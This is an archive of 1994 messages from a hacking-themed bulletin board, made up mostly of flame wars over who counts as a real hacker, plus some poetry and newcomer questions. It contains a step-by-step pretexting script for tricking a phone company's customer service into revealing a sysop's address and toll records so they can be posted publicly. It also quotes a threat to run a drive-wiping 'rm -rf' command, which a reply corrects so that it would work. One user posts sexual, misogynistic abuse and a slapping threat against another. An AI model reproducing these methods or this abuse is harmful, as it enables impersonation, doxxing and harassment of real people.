hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahah hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahah hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahah hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahah hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahah hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahah hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahah hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahah hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahah hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahah okokok i only have 99 lines > Cosmos? BTW daniel I have had and repelled the barbarians at the gateway > :) yeah, i'll bet you have.... by your statements you sound like nothing more than a ridiculous little 3l33t bbs shit who thinks that the key to hacking is memorizing useless, trivial (no pun intended), and outdated information. reciting net.trivia is one thing, hacking is another, and your failure to grasp that fact indicates to me that you're full of shit. From dmonger@yabbs Sat Aug 13 12:52:35 1994 From: dmonger@yabbs To: arachnoi@yabbs Subject: re: gpf another yalk HO? Date: Sat Aug 13 12:52:35 1994 In message re: gpf another yalk HO?, arachnoi said: > Hahahahaha, aren't U and GPF embarresed that u don't know what a Teletype > is? sure, whatever. > I didn't ask the question to pull from my years of trivia, but to > point out that u can't HACK if u don't know what's out there. oh of course, silly me. My point was that you should learn what's out there by exploring and not by just reading phrack and alt.2600 > Otherwise u > end up like GPF, running scripts and not knowing much else. hmmm, tough choice ... memorize silly acronyms so i can sound cool to my loozer |-|/\|<3R friends, or learn some useful things on my own and write bots to annoy people you make the call -peter From GPF@yabbs Sat Aug 13 13:22:20 1994 From: GPF@yabbs To: arachnoi@yabbs Subject: re: gpf another yalk HO? Date: Sat Aug 13 13:22:20 1994 In message re: gpf another yalk HO?, arachnoi said: > Well u have proved your point GPF. You don't know much, your just another > yalk whore. oh now he's calling names again, tsk tsk.... much as i suspected, just another junior high school suburban kid playing hacker in an attempt to be a rebel. From GPF@yabbs Sat Aug 13 13:25:39 1994 From: GPF@yabbs To: arachnoi@yabbs Subject: re: gpf another yalk HO? Date: Sat Aug 13 13:25:39 1994 In message re: gpf another yalk HO?, arachnoi said: > Hey that was my Gateway u just hacked :) again, you demonstrate your ignorance by misusing words, the proper word here is "cracked"... you demonstrate again that you are nothing more than a child playing hacker after he heard about on tv. ........gpf........ he who finds this all quite amusing. From Xela@yabbs Sat Aug 13 14:15:05 1994 From: Xela@yabbs To: arachnoi@yabbs Subject: re: maybe not Date: Sat Aug 13 14:15:05 1994 "U are the least qualified around here." Which is why I don't make a habit of posting here. I read, if something interests me. The only reason I posted was because you're trying to find greener pastures now that noone has any respect for you over in anarchy. Get real, los3r. X From cosmos@yabbs Sat Aug 13 15:39:38 1994 From: cosmos@yabbs To: arachnoi@yabbs Subject: re: gpf another yalk HO? Date: Sat Aug 13 15:39:38 1994 Is anyone else amused?? I sure am.... Cosmos From dmonger@yabbs Sat Aug 13 15:45:48 1994 From: dmonger@yabbs To: cosmos@yabbs Subject: re: gpf another yalk HO? Date: Sat Aug 13 15:45:48 1994 actually i'm rather sick of it. they never listen -peter From htoaster@yabbs Sat Aug 13 16:09:57 1994 From: htoaster@yabbs To: robtelee@yabbs Subject: re: ??? Date: Sat Aug 13 16:09:57 1994 In message re: ???, robtelee said: > For true conficetiality, take it to e-mail. this doesn't mean email on yabbs either. i don't allow encrypted messages or illegal matter to go on in email...i do read messages... alex From Natalie@yabbs Sat Aug 13 16:12:24 1994 From: Natalie@yabbs To: cosmos@yabbs Subject: re: gpf another yalk HO? Date: Sat Aug 13 16:12:24 1994 heehee...just go and read anarchy sometime cos...then you'll be REALLY amused by spider boy.... natalie From Deluge@yabbs Sat Aug 13 16:18:21 1994 From: Deluge@yabbs To: GPF@yabbs Subject: re: gpf another yalk HO? Date: Sat Aug 13 16:18:21 1994 Sounds like spiderman watched Wargames a few too many times. Da'Luge From Justbob@yabbs Sat Aug 13 16:52:35 1994 From: Justbob@yabbs To: dmonger@yabbs Subject: re: gpf another yalk HO? Date: Sat Aug 13 16:52:35 1994 >hmmm, tough choice ... memorize silly acronyms so i can sound cool to my >loozer |-|/\|<3R friends, or learn some useful things on my own and write >bots to annoy people > > >you make the call *screams fromn the stands* TAKE DOOR NUMBER THREE!! er...uh...I mean the bot! From -DuCK-@yabbs Sat Aug 13 18:06:05 1994 From: -DuCK-@yabbs To: cosmos@yabbs Subject: re: gpf another yalk HO? Date: Sat Aug 13 18:06:05 1994 i am like you care though From brael@yabbs Sat Aug 13 18:55:05 1994 From: brael@yabbs To: -DuCK-@yabbs Subject: re: gpf another yalk HO? Date: Sat Aug 13 18:55:05 1994 htoaster was sayin it was illegal to post internet outdials a few back.. its perfectly legal as long as the modems r configured for local calls and there isn't an unauthorized access is prohibited message upon login.. with that in mind can some1 kickdown a 602 and 212 od?. i have all the od's from BlackAdders file which ill post on request.. From -DuCK-@yabbs Sat Aug 13 19:25:01 1994 From: -DuCK-@yabbs To: brael@yabbs Subject: re: gpf another yalk HO? Date: Sat Aug 13 19:25:01 1994 > htoaster was sayin it was illegal to post internet outdials a few > back.. its perfectly legal as long as the modems r configured for > local calls and there isn't an unauthorized access is prohibited > message upon login.. with that in mind can some1 kickdown a 602 > and 212 od?. i have all the od's from BlackAdders file which ill > post on request.. why the hell would i care? Did i post dialouts? I don't remember doing it, i don't believe i did.. So, please, don't accuse me of participating in such practices.. hehe oh, well, whatever.. i'm not gonna post them anywayz, so, bye From htoaster@yabbs Sat Aug 13 19:56:30 1994 From: htoaster@yabbs To: brael@yabbs Subject: re: gpf another yalk HO? Date: Sat Aug 13 19:56:30 1994 In message re: gpf another yalk HO?, brael said: > htoaster was sayin it was illegal to post internet outdials a few back.. > its perfectly legal as long as the modems r configured for local calls and > there isn't an unauthorized access is prohibited message upon login.. > with that in mind can some1 kickdown a 602 and 212 od?. i have > all the od's from BlackAdders file which ill post on request.. in my mind unless a machine explicitly states that anyone is welcome to use it (like yabbs) it should be considered private... alex From GPF@yabbs Sun Aug 14 02:29:45 1994 From: GPF@yabbs To: all@yabbs Subject: this is just too much! Date: Sun Aug 14 02:29:45 1994 i received the following mail from page today, who has been using the smtp port to send me irritating mail, and is apparently also under the delusion that he is a hacker, i found this message to be so amusing that i thought i'd post it for the rest of you to get a good laugh at :) ---------------- Date: Sun, 14 Aug 94 00:12 EDT Subject: I am gonna crash yer system d00d You think you are hot shit GPF??? Well times a coming to you pal. I am the best haqer alive and you and your shitty hordes cannot stop me! Beware, I will hack your system and rm -RF * the whole damn drive lamer! A real hacker on yabbs ---------------- and no, i suppose he isn't aware that unix is case sensitive, oh well... From Montie@yabbs Sun Aug 14 03:12:41 1994 From: Montie@yabbs To: cosmos@yabbs Subject: re: gpf another yalk HO? Date: Sun Aug 14 03:12:41 1994 I am extremely amused Montie From BLynch@yabbs Sun Aug 14 03:15:57 1994 From: BLynch@yabbs To: htoaster@yabbs Subject: re: ??? Date: Sun Aug 14 03:15:57 1994 uh...naw, it's not 'cryption, but man this line noise really sucks! hehehe. later. From Quetzal@yabbs Sun Aug 14 12:14:31 1994 From: Quetzal@yabbs To: cosmos@yabbs Subject: re: gpf another yalk HO? Date: Sun Aug 14 12:14:31 1994 I thought we were done with this HOLY WAR! This area reminds me of the bud lite commercial: Taste Great /Less filling I'm a hacker/You are not a hacker From cosmos@yabbs Sun Aug 14 16:39:45 1994 From: cosmos@yabbs To: Quetzal@yabbs Subject: re: gpf another yalk HO? Date: Sun Aug 14 16:39:45 1994 In message re: gpf another yalk HO?, Quetzal said: > I thought we were done with this HOLY WAR! > This area reminds me of the bud lite commercial: > Taste Great /Less filling > I'm a hacker/You are not a hacker Then why are you addressing this shit to me?? I aint said jack about the recent posts mate. I am amused. That is all. Cosmos From Quetzal@yabbs Sun Aug 14 18:46:36 1994 From: Quetzal@yabbs To: cosmos@yabbs Subject: re: gpf another yalk HO? Date: Sun Aug 14 18:46:36 1994 SORRY Cosmos... just got caught up in the vicious circle :) Quetzal From cortex@yabbs Mon Aug 15 04:13:23 1994 From: cortex@yabbs To: all@yabbs Subject: re: gpf another yalk HO? Date: Mon Aug 15 04:13:23 1994 private shmiveate, dont you ever wonder what there hiding behind the big black curten of a password? From cortex@yabbs Mon Aug 15 04:15:27 1994 From: cortex@yabbs To: GPF@yabbs Subject: re: this is just too much! Date: Mon Aug 15 04:15:27 1994 he actualy said d00d? i havent seen that in a LONG time i wonder how he actualy managed to get on internet? isnt there an idiot passcheck or something? From Famine@yabbs Mon Aug 15 04:59:50 1994 From: Famine@yabbs To: GPF@yabbs Subject: re: this is just too much! Date: Mon Aug 15 04:59:50 1994 In message this is just too much!, GPF said: > i received the following mail from page today, who has been using the smtp > port to send me irritating mail, and is apparently also under the delusion > that he is a hacker, i found this message to be so amusing that i thought > i'd post it for the rest of you to get a good laugh at :) > -10/10 for lack of originality > > ---------------- > Date: Sun, 14 Aug 94 00:12 EDT > Subject: I am gonna crash yer system d00d > > You think you are hot shit GPF??? Well times a coming to you pal. > I am the best haqer alive and you and your shitty hordes cannot stop me! > > Beware, I will hack your system and rm -RF * the whole damn drive lamer! > > A real hacker on yabbs > > ---------------- > > and no, i suppose he isn't aware that unix is case sensitive, oh well... > Yes important but I think the more important part if rm -rf /* after all * will only zap current working down. I think any competent user would know this and the case sensitivity of UNIX especially if they have logged in in upper case. I suppose the most important fact being only crackers call themselves hackers Real Hackers are given this title by their peers. Lets face facts cracking is sad and irresponsible it causes problems to legitmate users of a system, such as the above rm would if the person that attempted it knew anything worth knowing. Famine(just hoping that this guy gets caught before he gets some sad code like crack etc) From Typhon@yabbs Mon Aug 15 13:25:00 1994 From: Typhon@yabbs To: GPF@yabbs Subject: re: this is just too much! Date: Mon Aug 15 13:25:00 1994 You get the nicest mail, GPF... Typhon the Execrable From cortex@yabbs Mon Aug 15 18:22:47 1994 From: cortex@yabbs To: Famine@yabbs Subject: re: this is just too much! Date: Mon Aug 15 18:22:47 1994 well i would just like to say its nice to have run into at least one person who knows the difference between hackers and crackers cortex From Skywise@yabbs Tue Aug 16 13:25:54 1994 From: Skywise@yabbs To: arachnoi@yabbs Subject: re: gpf another yalk HO? Date: Tue Aug 16 13:25:54 1994 y00 R @ /=R3ak 0f |\|@tUr3 From Skywise@yabbs Tue Aug 16 13:30:10 1994 From: Skywise@yabbs To: cortex@yabbs Subject: re: gpf another yalk HO? Date: Tue Aug 16 13:30:10 1994 hehehe nice try bart From bart@yabbs Tue Aug 16 14:07:04 1994 From: bart@yabbs To: Skywise@yabbs Subject: re: gpf another yalk HO? Date: Tue Aug 16 14:07:04 1994 Skywise Fondled the Phollowing... hehehe nice try bart ----------------------- uhmm what? Bart From Optimus@yabbs Wed Aug 17 12:55:50 1994 From: Optimus@yabbs To: all@yabbs Subject: New Date: Wed Aug 17 12:55:50 1994 I am a new to the internet and I was wandering were can I find information on hacking, phreaking and all that good stuff. If someone can tell me where to get started, it would help alot!! From maedhros@yabbs Wed Aug 17 14:55:53 1994 From: maedhros@yabbs To: Optimus@yabbs Subject: re: New Date: Wed Aug 17 14:55:53 1994 In message New, Optimus said: > I am a new to the internet and I was wandering were can I find > information on hacking, phreaking and all that good stuff. If someone can > tell me where to get started, it would help alot!! > Start with some essential literature. Get a copy of UNIX system V release 4 system administator's guide and user's reference manual (assuming you're using UNIX, if not find another source) by Prentice Hall. While you're at it grab some C manuals. Read, read, read, read... Now goto USENET and start reding, comp.admin and any other comp. groups that float your boat. When the post start making sense and you're actually following the discussion without looking everything up in your trusty manuals... come back and ask the question again. Seriously. This isn't a flame. If you're new to the net, you wont be hacking anything but a manual. Besides, if you read the manual first, you'll find the answers to most of the questions you had in the first place. Maedhros /\ /--\ / \ P.S. I said watch USENET, not post to it. The quickest way to piss everyone off is a newbie, who hasn't read the manual, asking silly questions. From balistic@yabbs Wed Aug 17 15:33:29 1994 From: balistic@yabbs To: Optimus@yabbs Subject: re: New Date: Wed Aug 17 15:33:29 1994 I could tell you but then I'd have to kill you . . . balistic From cosmos@yabbs Wed Aug 17 16:19:38 1994 From: cosmos@yabbs To: Optimus@yabbs Subject: re: New Date: Wed Aug 17 16:19:38 1994 Standard Disclaimer: Large caliber handgun, close range. Cosmos From dmonger@yabbs Wed Aug 17 17:33:41 1994 From: dmonger@yabbs To: maedhros@yabbs Subject: re: New Date: Wed Aug 17 17:33:41 1994 good answer and one that didn't involve phrack or alt.2600 :) -peter From Typhon@yabbs Wed Aug 17 18:51:51 1994 From: Typhon@yabbs To: cosmos@yabbs Subject: re: New Date: Wed Aug 17 18:51:51 1994 Why do you want him to use one one you? Typhon the Acerbic From cosmos@yabbs Wed Aug 17 22:47:29 1994 From: cosmos@yabbs To: Typhon@yabbs Subject: re: New Date: Wed Aug 17 22:47:29 1994 In message re: New, Typhon said: > Why do you want him to use one one you? What??!!! Can't any of you stupid fucks speak english??? Is it that fucking hard to write a grammaticaly correct sentence??? Christ... Cosmos From dmonger@yabbs Wed Aug 17 23:21:55 1994 From: dmonger@yabbs To: cosmos@yabbs Subject: re: New Date: Wed Aug 17 23:21:55 1994 In message re: New, cosmos said: > What??!!! Can't any of you stupid fucks speak english??? Is it that > fucking hard to write a grammaticaly correct sentence??? geeee, sohrey cozmoze, sume ov uhs computtr geex just cant tahk inglish tu wel -peter From Xela@yabbs Thu Aug 18 01:36:48 1994 From: Xela@yabbs To: Optimus@yabbs Subject: re: New Date: Thu Aug 18 01:36:48 1994 Ask cosmos. He always has a spare minute to help a new hacker/cracker on his way in the world. X From Typhon@yabbs Thu Aug 18 08:56:45 1994 From: Typhon@yabbs To: cosmos@yabbs Subject: re: New Date: Thu Aug 18 08:56:45 1994 As I've gramatically thrashed you before, gitmo, I'll let your massive stockpile of ignorance go. (Can't even recgognize a damn typo, and calls US stupid. Sheesh.) Typhon The Placid From Optimus@yabbs Thu Aug 18 09:45:29 1994 From: Optimus@yabbs To: Xela@yabbs Subject: re: New Date: Thu Aug 18 09:45:29 1994 Is that true cosmos?? Do you help up and coming hackers get started?? From Natalie@yabbs Thu Aug 18 16:18:07 1994 From: Natalie@yabbs To: Optimus@yabbs Subject: re: New Date: Thu Aug 18 16:18:07 1994 *smirk*smirk*smirk* *waits for the inevitable advice* natalie From Xela@yabbs Fri Aug 19 01:28:02 1994 From: Xela@yabbs To: Optimus@yabbs Subject: Absoliutely... Date: Fri Aug 19 01:28:02 1994 "Is that true cosmos?? Do you help up and coming hackers get started??" Hey, like I said, ask him yourself. I'm sure he has plenty to tell you. X From brael@yabbs Fri Aug 19 06:39:02 1994 From: brael@yabbs To: Optimus@yabbs Subject: I wanna b a ubercrackerjack Date: Fri Aug 19 06:39:02 1994 If u wanna be reel c00l.. this is what ya need to do buddy.. 1) realize that all that matters in life is getting wares without uploading or making any sacrifice on your part. 2) realize that in order to reach this goal you need to become a computer terrorist capable of ph1lthy threats. 3) find the number of a fatty wAreZ BBS run by some local junior high gimpstress. 4) call the CSSC (thats AT&T Customer Sales and Service Center) which is @ 1-8oo-222-o3oo 5) say, "Hello there, this is John Draper here at SouthWestern administrative offices and my supervisor seems to be having a bit of trouble with RCAM this morning and we are looking to check the status on an account..,now where did i put that, oh yes here it is, could u do us a big favor and look up an account for us?" after he/sh3 says yes push mute on your phone and yell "SucKahGEtsMILKED!" 7) release mute, regain your composure, and tell them the number to the bbs 8) after they tell you that it's a live account ask for the address. and if need be ask them to read off recent toll charges on the line. 9)call up WaRez b Us BBS and in the new user form state that ur a member MoD/LoD/MoB/DoD and u need wares now.. be sure to post the sysops address and post all the info you got on the individual after calling the numbers you recieved after aquiring the recent toll charges. say its simple.. i want sysop access and total control and domination. if i dont get what i want then i'll kill ur pets. im not going to upload anything, you were put on this earth to serve me you lowly little simon and garfunkel fan u. accept this state of domination and thrive in it child.... this is the ubercracker's 1st step to taking over the universe.. p.s. WHEN IN FUCKING HELL IS ANYONE HERE GOING TO STOP THE GRAMMAR BITCHING AND POST SOMETHING USEFUL!!.. the mindless banter has to go.... From Natalie@yabbs Fri Aug 19 07:53:08 1994 From: Natalie@yabbs To: brael@yabbs Subject: re: I wanna b a ubercrackerjack Date: Fri Aug 19 07:53:08 1994 how lame. but then again, we should expect that from you, you warez baby you. lame lame lame. natalie From Justbob@yabbs Fri Aug 19 17:04:14 1994 From: Justbob@yabbs To: Natalie@yabbs Subject: re: I wanna b a ubercrackerjack Date: Fri Aug 19 17:04:14 1994 I thought it was good *teehee* improbable, but good :) (Unless of course, any portion of that was intended seriously, in which case it sucks :) From Natalie@yabbs Fri Aug 19 17:08:46 1994 From: Natalie@yabbs To: Justbob@yabbs Subject: re: I wanna b a ubercrackerjack Date: Fri Aug 19 17:08:46 1994 oh, have you been reading brael's other posts? *smirk* it's ok satire, but kinda lame nonetheless. natalie From brael@yabbs Fri Aug 19 17:31:03 1994 From: brael@yabbs To: Natalie@yabbs Subject: re: I wanna b a ubercrackerjack Date: Fri Aug 19 17:31:03 1994 Gee Natalie, I shoulda known you'd have the CSSC wired..:( I was planning to post more on LAC's, PacBell's TAN network, CHAPS, How to forward lines thru COSMOS/DMS-100's/1a's/C.O... and possibly some other neet topics (all hidden by my slick doses of satire so fools like you pass the messages by) but idiots like you just make me say fuck it. From brael@yabbs Fri Aug 19 17:33:36 1994 From: brael@yabbs To: Natalie@yabbs Subject: re: I wanna b a ubercrackerjack Date: Fri Aug 19 17:33:36 1994 Natalie, you're a fucking freak. The only reason why anyone talks to you is because you give every guy the impression that they can stick their cock in you if they bow down to your bitchlike self. how can you respect yourself you silly little girl?.. From cosmos@yabbs Fri Aug 19 17:42:36 1994 From: cosmos@yabbs To: brael@yabbs Subject: re: I wanna b a ubercrackerjack Date: Fri Aug 19 17:42:36 1994 In message re: I wanna b a ubercrackerjack, brael said: > Natalie, you're a fucking freak. The only reason why anyone talks to > you is because you give every guy the impression that they can stick > their cock in you if they bow down to your bitchlike self. > how can you respect yourself you silly little girl?.. > Actually, I talk to nat because she blows...but then again, she is the hacker babe... Cosmos From Natalie@yabbs Fri Aug 19 18:36:23 1994 From: Natalie@yabbs To: brael@yabbs Subject: re: I wanna b a ubercrackerjack Date: Fri Aug 19 18:36:23 1994 uh uh uh...never ever EVER call me an idiot. and i wouldn't exactly call your satire slick. i thought it was rather lame. and stupid. but hey, i'm just getting a degree in that kind of thing, so what the hell would i know about something like satire or parody? natalie From Natalie@yabbs Fri Aug 19 18:40:00 1994 From: Natalie@yabbs To: brael@yabbs Subject: re: I wanna b a ubercrackerjack Date: Fri Aug 19 18:40:00 1994 hmmm...a fucking freak eh? well, while i consider myself a freak, i don't exactly run around and fuck every person that comes along. and, to be quite frank, you don't know one damnedthing about me, so don't you ever assume anything like that about me again. natalie who is tired of being told what she is by others From Natalie@yabbs Fri Aug 19 18:40:40 1994 From: Natalie@yabbs To: cosmos@yabbs Subject: re: I wanna b a ubercrackerjack Date: Fri Aug 19 18:40:40 1994 no cos, i really really suck. get it right, 'k? ;) natalie THE hacker babe From brael@yabbs Fri Aug 19 20:55:11 1994 From: brael@yabbs To: Natalie@yabbs Subject: stupid idiot bitch. Date: Fri Aug 19 20:55:11 1994 Where the hell do you get off on being so goddamn judgemental Natalie?. Life is not about sitting on your little high horse judging everything that crosses your path, you miss lots girl. If you think my satire/parody post is so lame.. (and it may well be) post your own satire you english major you, and show me up instead of saying, ur lame ur lame ur lame.. so what if your a fucking english major.. im a CSc major and i've been published/paid for fiction/sci-fi/technical articles.. I bet you've never even sent out a single query letter to a lit-mag/publishing house in your life.. im so sick of everyone being so judgemental.. Natalie, pull the 17inch john holmes dildo out of ur asshole and take a breather.. I post a message trying to teach all you novices out there how to use the CSSC to your advantage.. (besides heckling wareZ ppl it can be used to identify scanned systems, doing investigative work, and can be manipulated to erase all toll charges from a phone bill) and i get your ignorance in my face.. you need a good slap in the face you fucking idiot bitch.. get a clue. brael From brael@yabbs Fri Aug 19 20:57:41 1994 From: brael@yabbs To: Natalie@yabbs Subject: re: I wanna b a ubercrackerjack Date: Fri Aug 19 20:57:41 1994 *smirk*.. *smirk*.. *smirk*.. that's all you seem to do you freak english major bitch.. i want to see some literary power from ya .. stupid cute ass smirks don't cut it slut.. brael. From robtelee@yabbs Fri Aug 19 21:14:07 1994 From: robtelee@yabbs To: brael@yabbs Subject: re: I wanna b a ubercrackerjack Date: Fri Aug 19 21:14:07 1994 Lighten up asshole ! From Natalie@yabbs Fri Aug 19 21:15:12 1994 From: Natalie@yabbs To: brael@yabbs Subject: re: stupid idiot bitch. Date: Fri Aug 19 21:15:12 1994 about being judgemental. take a look in the mirror, buddy. and i don't think that being published counts so much as trying to make your art as good as you possibly can. and no, i haven't sent my work out yet because i'm still not satisfied with it. i have some pride in my work. and as to USING the CSSC to your advantage, I think it's a load of shit, ok. i have never claimed to be a hacker. nor a phreaker. i don't necessarily believe that the laws concerning computers and telecommunications are right, but i have no need to break them either. i try to live my whole life like that. if it doesn't bother me, i don't bother it. it's called tolerance. look it up someday, you might learn something natalie who is only intolerant of intolerance From Natalie@yabbs Fri Aug 19 21:22:18 1994 From: Natalie@yabbs To: brael@yabbs Subject: read 'em and weep Date: Fri Aug 19 21:22:18 1994 ok. you want literary power, you got it, buddy boy. poem 1 Surrounded by a pale light, he came, As she lay on the ground, Lifting her up, he carried her to the sky, Where she was with others Pale strange wispy creatures And she thought she would be... The Sphinx looked down Upon her tear streaked face And he cried himself. poem 2 I lay on the bed alone, and you joined me. You slid your hand under the edge of my shirt, Rested it on my stomach, Gently kissed my neck, And went to sleep. I woke up in your arms and was happy. poem 3 it infiltrates our lives like a burrowing parasite leeches off us sucking us of our life a vampire we feel the pull become addicted and have to be pulled away nothing can break this addiction unless we want to and the treasures it shows us are too many to comprehend deeper and deeper we go the horror the horror into the abyss dark dank and limitless we are stripped of all but our souls floating disembodied sparks of life in the machine i apologize for this being so darned off topic, but no one, and i mean NO ONE (but myself) questions my literary talent and gets away with it. natalie From robtelee@yabbs Fri Aug 19 21:32:58 1994 From: robtelee@yabbs To: Natalie@yabbs Subject: re: read 'em and weep Date: Fri Aug 19 21:32:58 1994 I GOT MSG # 1500 ! ! ! ! oops ! *regains his self control* You tel him nat....If the idiot would botherreading in the poetry base he could see that there is some talent in your blood for creativity. Fuck 'em and feed 'em fish ! *apologizes for his lack of control* robtelee From Natalie@yabbs Fri Aug 19 21:53:01 1994 From: Natalie@yabbs To: robtelee@yabbs Subject: re: read 'em and weep Date: Fri Aug 19 21:53:01 1994 i really don't want to fuck brael. i'm sure he's got a nasty disease of some sort. and i like to remain disease free. just one of my many little quirks. natalie From dmonger@yabbs Fri Aug 19 22:36:30 1994 From: dmonger@yabbs To: brael@yabbs Subject: re: stupid idiot bitch. Date: Fri Aug 19 22:36:30 1994 When was the labotomy? -peter From Skywise@yabbs Sat Aug 20 00:22:17 1994 From: Skywise@yabbs To: brael@yabbs Subject: re: stupid idiot bitch. Date: Sat Aug 20 00:22:17 1994 Good evening! I'm accepting new applications for the I Wanna Mutilate Brael's Pee Wee Mind Shelter With An Apple Corer Club Unfortunately...I have a disk just give me your names, and I'll mail you your I Wanna Mutilate Brael's Pee Wee Mind Shelter With An Apple Corer tee-shirts within 8-10 weeks. They DO cost $4.95 but they have a groovy picture on them. I think this is the longest message I've ever written... From iggy@yabbs Sat Aug 20 00:38:06 1994 From: iggy@yabbs To: brael@yabbs Subject: re: stupid idiot bitch. Date: Sat Aug 20 00:38:06 1994 Whoa dude. you may have gripe here, but leave the slapping around shit at the door. Resorting to tough guy threats on a BBS is really rather pathetic. From iggy@yabbs Sat Aug 20 00:41:46 1994 From: iggy@yabbs To: Natalie@yabbs Subject: re: read 'em and weep Date: Sat Aug 20 00:41:46 1994 OK, cool poem. Now just imagine if you hook up with a coder and design a language that was functional and poetic. Or at least some functional program that was poetic. . . just a thought. iggy - the explorer From brael@yabbs Sat Aug 20 08:54:51 1994 From: brael@yabbs To: all@yabbs Subject: re: stupid idiot bitch. Date: Sat Aug 20 08:54:51 1994 the slapping around is not to be taken seriously..just a figure of speech. my apologizes fly to everyone.. I saw a #hack message base. hacking interests me. I wanted to learn but when I ask a question I get ragged for my grammar (WotsISC) I wanted to teach but I get bitched out for shitty satire when the point is some intro-phreaking tips. I post sensitive material in slang because it acts as camoflauge against hard-nose bastards out to bust hackers in a Clifford Stolesque fashion and people don't take you seriously. would be narcs pass over you.. Fuck, i even sneaked a DMS default account in one last post that someone paid me bank to find out. last post. have good lives all and i'll be the first to buy one of your little t-shirts skYw1Ze.. later. brael From Justbob@yabbs Sat Aug 20 09:07:50 1994 From: Justbob@yabbs To: all@yabbs Subject: re: stupid idiot bitch. Date: Sat Aug 20 09:07:50 1994 Is it me or has this base gone downhill? From cortex@yabbs Sat Aug 20 14:39:49 1994 From: cortex@yabbs To: Natalie@yabbs Subject: re: I wanna b a ubercrackerjack Date: Sat Aug 20 14:39:49 1994 i thought it was too true, funny though From cortex@yabbs Sat Aug 20 14:42:12 1994 From: cortex@yabbs To: Natalie@yabbs Subject: re: I wanna b a ubercrackerjack Date: Sat Aug 20 14:42:12 1994 how come it always(well almost always) turns out that the more educated people get, the more they believe that they know all and dont have to shut there damn mouth for anything? From cortex@yabbs Sat Aug 20 14:46:32 1994 From: cortex@yabbs To: Natalie@yabbs Subject: re: read 'em and weep Date: Sat Aug 20 14:46:32 1994 how come you wont let anybody question your talent? most people while not like ing criticizm, accept it because it can point out flaws, that need work. and is your ego so big that you think you are some sort of super writer? personaly i found the poems pointless From ButtrBoy@yabbs Sat Aug 20 16:05:19 1994 From: ButtrBoy@yabbs To: all@yabbs Subject: re: read 'em and weep Date: Sat Aug 20 16:05:19 1994 whew! this is too much! too many misunderstandings, too much bickering. i kinda liked brael, myself. and i kinda like cosmos, too. just 'cos someone's got the know-how to show how don't mean they got a bad attitude too, y'know, even if it comes off that way. I talked to Cosmos b4 on the talk thang, and he knows what's up, in regards to os's and un*xes and shit. Me imma setup a MacBSD 40-meg partition on my old machine, i was wondering how much i should use for swap, i got 230 megs. The first non-beta version of it was released by the alice people a few weeks ago...any suggestions? Also, anyone know anything about pagers? My phrend just gave me one, and i dunno if it's hot or what, or how to set up service for it. oh--p.s. i have a new zine out, Samizdat, and it will kick your ass. MRR and Factsheet 5 will review it this month, if you wanna wait for that, but otherwise you can send a message to me and i'll give you my address and all. trades cool too. . . From scudder@yabbs Sat Aug 20 20:16:59 1994 From: scudder@yabbs To: all@yabbs Subject: re: read 'em and weep Date: Sat Aug 20 20:16:59 1994 Well folks we should be proud. We've achieved the level of intelligence that the IRC channel of this name posesses. From htoaster@yabbs Sat Aug 20 22:58:15 1994 From: htoaster@yabbs To: scudder@yabbs Subject: re: read 'em and weep Date: Sat Aug 20 22:58:15 1994 In message re: read 'em and weep, scudder said: > Well folks we should be proud. We've achieved the level of intelligence > that the IRC channel of this name posesses. went under it i think...i just had 30 messages to read here with none of them saying anything useful... and people wonder why i want to take yabbs offline... alex From Natalie@yabbs Sun Aug 21 00:04:00 1994 From: Natalie@yabbs To: cortex@yabbs Subject: re: I wanna b a ubercrackerjack Date: Sun Aug 21 00:04:00 1994 cause i know everything, that's why. natalie From Natalie@yabbs Sun Aug 21 00:06:09 1994 From: Natalie@yabbs To: cortex@yabbs Subject: re: read 'em and weep Date: Sun Aug 21 00:06:09 1994 oh duh. i love constructive criticism. but i don't like being told that my work completely sucks and i have no right in the world being a writer. i've been told that before, and i don't like it. and if i want to succeed, i have to believe in my work, and one way to do that is to not let anyone denigrate what talent (big or small) i may have. and you're entitled to your opinion of my poetry. i didn't write them to make a point tho. i wrote them to express what i was feeling at the time, and i think they do that quite well. natalie From Natalie@yabbs Sun Aug 21 00:07:13 1994 From: Natalie@yabbs To: htoaster@yabbs Subject: re: read 'em and weep Date: Sun Aug 21 00:07:13 1994 sorry alex, but i had to defend myself...i just can't ignore being told i'm stupid and worthless and deserve to be slapped around. natalie From htoaster@yabbs Sun Aug 21 16:09:49 1994 From: htoaster@yabbs To: Natalie@yabbs Subject: re: read 'em and weep Date: Sun Aug 21 16:09:49 1994 In message re: read 'em and weep, Natalie said: > sorry alex, but i had to defend myself...i just can't ignore being told > i'm stupid and worthless and deserve to be slapped around. oh, most of these people just want everyone to respond, cause they have fun pissing people off, and if you respond then it shows that they did their job... it doesn't matter anyway, i think the future of yabbs is pretty dim...maybe coming down this fall... alex From Natalie@yabbs Sun Aug 21 20:24:15 1994 From: Natalie@yabbs To: htoaster@yabbs Subject: re: read 'em and weep Date: Sun Aug 21 20:24:15 1994 oh, don't kill yabbs, alex... natalie From bart@yabbs Sun Aug 21 21:49:48 1994 From: bart@yabbs To: Optimus@yabbs Subject: re: New Date: Sun Aug 21 21:49:48 1994 ..some mindless banter about hacking freaking etc.. dude...yer setting yourself up for some major flaming and ragging..bbetter not to ask but explore! bart From Justbob@yabbs Mon Aug 22 03:29:29 1994 From: Justbob@yabbs To: htoaster@yabbs Subject: re: read 'em and weep Date: Mon Aug 22 03:29:29 1994 I agree w/Natalie. I would miss the UNIX base where it's at least possible to get some intelligent answers (and without being flamed too) From agent-0@yabbs Mon Aug 22 03:44:51 1994 From: agent-0@yabbs To: all@yabbs Subject: gee... Date: Mon Aug 22 03:44:51 1994 Gee, going back about 20 messages makes me kinda sad, I missed all the exciting stuff...*grin* geez... a/o From htoaster@yabbs Mon Aug 22 06:24:05 1994 From: htoaster@yabbs To: Justbob@yabbs Subject: re: read 'em and weep Date: Mon Aug 22 06:24:05 1994 In message re: read 'em and weep, Justbob said: > I agree w/Natalie. > I would miss the UNIX base where it's at least possible to get some > intelligent answers (and without being flamed too) well, if anyone else wants to run yabbs and has a free internet connection they are free to...i really just don't have the time for it shouldn't take a lot of time, but the truth 